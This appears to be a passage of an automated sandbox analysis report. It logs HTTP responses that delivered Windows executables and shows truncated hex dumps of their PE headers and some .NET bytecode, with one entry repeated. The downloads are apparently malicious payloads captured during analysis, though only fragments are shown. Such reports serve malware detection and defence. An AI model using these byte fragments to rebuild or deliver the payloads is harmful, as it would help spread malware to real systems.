00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Jan 2025 07:20:17 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Tue, 21 Jan 2025 12:42:31 GMTETag: "d87fd-62c36b5dccc1c"Accept-Ranges: bytesContent-Length: 886781Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 58 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 10 10 00 00 04 00 00 72 7c 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 fe bc 00 00 00 00 00 00 00 00 00 00 85 5e 0d 00 78 29 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 fe bc 00 00 00 40 0f 00 00 be 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 00 10 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Jan 2025 07:20:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 23 Jan 2025 12:11:27 GMTETag: "6e800-62c5e826f344d"Accept-Ranges: bytesContent-Length: 452608Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 aa 92 b5 10 ee f3 db 43 ee f3 db 43 ee f3 db 43 53 bc 4d 43 ef f3 db 43 f0 a1 4e 43 cc f3 db 43 f0 a1 5f 43 da f3 db 43 f0 a1 58 43 66 f3 db 43 c9 35 a0 43 eb f3 db 43 ee f3 da 43 9f f3 db 43 f0 a1 51 43 ef f3 db 43 f0 a1 4f 43 ef f3 db 43 f0 a1 4a 43 ef f3 db 43 52 69 63 68 ee f3 db 43 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 34 d2 f1 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 05 00 00 3a 01 00 00 00 00 00 61 6d 00 00 00 10 00 00 00 10 06 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 08 00 00 04 00 00 fe 5c 07 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 ff 05 00 3c 00 00 00 00 a0 06 00 78 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 48 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 f7 05 00 00 10 00 00 00 f8 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 8a 00 00 00 10 06 00 00 62 00 00 00 fc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 69 01 00 00 a0 06 00 00 8a 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 19120Last-Modified: Sun, 26 Jan 2025 14:46:10 GMTConnection: keep-aliveETag: "67964ab2-4ab0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 65 6c e6 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 0e 00 00 00 0a 00 00 00 00 00 00 5e 2d 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 2d 00 00 4b 00 00 00 00 40 00 00 78 06 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 b0 30 00 00 00 60 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 0d 00 00 00 20 00 00 00 0e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 78 06 00 00 00 40 00 00 00 08 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 2d 00 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 21 00 00 18 0b 00 00 03 00 02 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 24 00 00 0a 2a 1b 30 05 00 f9 00 00 00 01 00 00 11 1f 24 28 0f 00 00 0a 72 01 00 00 70 72 0d 00 00 70 28 10 00 00 0a 73 11 00 00 0a 0a 28 12 00 00 0a 6f 13 00 00 0a 6f 14 00 00 0a 72 1f 00 00 70 28 02 00 00 06 00 06 6f 15 00 00 0a 28 16 00 00 0a 3a 92 00 00 00 72 33 00 00 70 0b 72 6f 00 00 70 0c 72 85 00 00 70 0d 72 97 00 00 70 13 04 73 17 00 00 0a 13 05 11 05 1f 09 8d 1b 00 00 01 25 16 72 e5 00 00 70 a2 25 17 08 a2 25 18 72 ed 00 00 70 a2 25 19 07 a2 25 1a 72 f1 00 00 70 a2 25 1b 11 04 a2 25 1c 72 ff 00 00 70 a2 25 1d 09 a2 25 1e 72 0b 01 00 70 a2 28 18 00 00 0a 6f 19 00 00 0a 11 05 17 6f 1a 00 00 0a 11 05 17 6f 1b 00 00 0a 11 05 72 1d 01 00 70 6f 1c 00 00 0a 11 05 28 1d 00 00 0a 26 2b 0c 72 1f 00 00 70 28 03 00 00 06 de 14 de 03 26 de 00 20 c0 d4 01 00 28 1e 00 00 0a 38 3d ff ff ff 2a 00 00 00 01 10 00 00 00 00 36 00 b0 e6 00 03 10 00 00 01 1b 30 03 00 28 00 00 00 02 00 00 11 72 25 01 00 70 0a 7e 1f 00 00 0a 06 17 6f 20 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sat, 09 Nov 2024 20:16:01 GMTAccept-Ranges: bytesETag: "55c73132e432db1:0"Server: Microsoft-IIS/10.0Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Length: 1387008Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee dc 7e 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 20 15 00 00 08 00 00 00 00 00 00 4e 3f 15 00 00 20 00 00 00 40 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 3f 15 00 4b 00 00 00 00 40 15 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 1f 15 00 00 20 00 00 00 20 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 40 15 00 00 06 00 00 00 22 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 15 00 00 02 00 00 00 28 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 3f 15 00 00 00 00 00 48 00 00 00 02 00 05 00 8c bc 00 00 88 5f 00 00 03 00 00 00 03 00 00 06 14 1c 01 00 e8 22 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 1a 28 01 00 00 06 2a 00 1a 28 0b 00 00 06 2a 00 1e 02 28 01 00 00 0a 2a 13 30 03 00 94 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 03 00 00 00 34 00 00 00 05 00 00 00 2e 00 00 00 38 2f 00 00 00 7e 01 00 00 04 3a 1f 00 00 00 20 00 00 00 00 7e aa 00 00 04 7b 68 00 00 04 3a cc ff ff ff 26 20 00 00 00 00 38 c1 ff ff ff 7e 01 00 00 04 2a 72 01 00 00 70 d0 03 00 00 02 28 02 00 00 0a 6f 03 00 00 0a 73 04 00 00 0a 80 01 00 00 04 20 01 00 00 00 7e aa 00 00 04 7b 68 00 00 04 3a 89 ff ff ff 26 20 02 00 00 00 38 7e ff ff ff 1a 7e 02 00 00 04 2a 00 1e 02 80 02 00 00 04 2a 6a 28 05 00 00 06 72 3b 00 00 70 7e 02 00 00 04 6f 05 00 00 0a 74 01 00 00 1b 2a 00 26 7e 03 00 00 04 14 fe 01 2a 00 00 1a 7e 03 00 00 04 2a 00 13 30 04 00 cf 00 00 00 02 00 00 11 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 04 00 00 00 a7 00 00 00 26 00 00 00 70 00 00 00 05 00 00 00 38 a2 00 00 00 28 0f 00 00 06 75 02 00 00 1b 16 6f 06 00 00 0a
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 905203Last-Modified: Sat, 25 Jan 2025 19:48:27 GMTConnection: keep-aliveETag: "6795400b-dcff3"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 10 00 00 04 00 00 7d 40 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 16 a4 00 00 00 00 00 00 00 00 00 00 33 73 0d 00 c0 5c 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 16 a4 00 00 00 00 10 00 00 a6 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 b0 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Wed, 08 Jan 2025 20:20:02 GMTAccept-Ranges: bytesETag: "5558d9b2a62db1:0"Server: Microsoft-IIS/10.0Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Length: 313344Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b0 ec 0e 8e 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 be 04 00 00 08 00 00 00 00 00 00 1e dc 04 00 00 20 00 00 00 e0 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 db 04 00 4b 00 00 00 00 e0 04 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 bc 04 00 00 20 00 00 00 be 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 05 00 00 00 e0 04 00 00 06 00 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 04 00 00 00 00 00 48 00 00 00 02 00 05 00 b8 22 00 00 bc 0d 00 00 03 00 00 00 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 1a 28 01 00 00 06 2a 00 1a 28 07 00 00 06 2a 00 1b 30 04 00 c2 00 00 00 01 00 00 11 28 01 00 00 0a 0a 06 20 00 01 00 00 6f 02 00 00 0a 06 72 01 00 00 70 28 03 00 00 0a 6f 04 00 00 0a 06 72 5b 00 00 70 28 03 00 00 0a 6f 05 00 00 0a 06 06 6f 06 00 00 0a 06 6f 07 00 00 0a 6f 08 00 00 0a 0b 73 09 00 00 0a 0c 20 50 ab 04 00 8d 04 00 00 01 25 d0 03 00 00 04 28 0a 00 00 0a 73 0b 00 00 0a 0d 09 07 16 73 0c 00 00 0a 13 04 11 04 08 6f 0d 00 00 0a 08 6f 0e 00 00 0a 28 05 00 00 06 13 05 dd 36 00 00 00 11 04 39 07 00 00 00 11 04 6f 0f 00 00 0a dc 09 39 06 00 00 00 09 6f 0f 00 00 0a dc 08 39 06 00 00 00 08 6f 0f 00 00 0a dc 06 39 06 00 00 00 06 6f 0f 00 00 0a dc 11 05 2a 00 00 01 34 00 00 02 00 6f 00 1a 89 00 0f 00 00 00 00 02 00 65 00 33 98 00 0d 00 00 00 00 02 00 4a 00 5b a5 00 0d 00 00 00 00 02 00 06 00 ac b2 00 0d 00 00 00 00 1b 30 05 00 6c 00 00 00 02 00 00 11 73 09 00 00 0a 0a 02 73 0b 00 00 0a 0b 1a 8d 04 00 00 01 0c 07 08 16 1a 6f 10 00 00 0a 26 08 16 28
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 19120Last-Modified: Sun, 26 Jan 2025 14:46:10 GMTConnection: keep-aliveETag: "67964ab2-4ab0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 65 6c e6 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 0e 00 00 00 0a 00 00 00 00 00 00 5e 2d 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 2d 00 00 4b 00 00 00 00 40 00 00 78 06 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 b0 30 00 00 00 60 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 0d 00 00 00 20 00 00 00 0e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 78 06 00 00 00 40 00 00 00 08 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 2d 00 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 21 00 00 18 0b 00 00 03 00 02 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 24 00 00 0a 2a 1b 30 05 00 f9 00 00 00 01 00 00 11 1f 24 28 0f 00 00 0a 72 01 00 00 70 72 0d 00 00 70 28 10 00 00 0a 73 11 00 00 0a 0a 28 12 00 00 0a 6f 13 00 00 0a 6f 14 00 00 0a 72 1f 00 00 70 28 02 00 00 06 00 06 6f 15 00 00 0a 28 16 00 00 0a 3a 92 00 00 00 72 33 00 00 70 0b 72 6f 00 00 70 0c 72 85 00 00 70 0d 72 97 00 00 70 13 04 73 17 00 00 0a 13 05 11 05 1f 09 8d 1b 00 00 01 25 16 72 e5 00 00 70 a2 25 17 08 a2 25 18 72 ed 00 00 70 a2 25 19 07 a2 25 1a 72 f1 00 00 70 a2 25 1b 11 04 a2 25 1c 72 ff 00 00 70 a2 25 1d 09 a2 25 1e 72 0b 01 00 70 a2 28 18 00 00 0a 6f 19 00 00 0a 11 05 17 6f 1a 00 00 0a 11 05 17 6f 1b 00 00 0a 11 05 72 1d 01 00 70 6f 1c 00 00 0a 11 05 28 1d 00 00 0a 